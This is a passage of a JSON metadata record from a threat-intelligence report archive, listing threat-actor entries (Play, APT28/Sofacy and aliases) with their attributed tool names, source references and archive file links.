https://objective-see.org/blog/blog_0x16.html\r\nhttps://objective-see.org/blog/blog_0x16.html\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://objective-see.org/blog/blog_0x16.html" ], "report_names": [ "blog_0x16.html" ], "threat_actors": [ { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775446588, "ts_updated_at": 1775792269, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0390b2659dd3307a0145bbf3a01baecb0c2219ef.pdf", "text": "https://archive.orkl.eu/0390b2659dd3307a0145bbf3a01baecb0c2219ef.txt", "img": "https://archive.orkl.eu/0390b2659dd3307a0145bbf3a01baecb0c2219ef.jpg" } }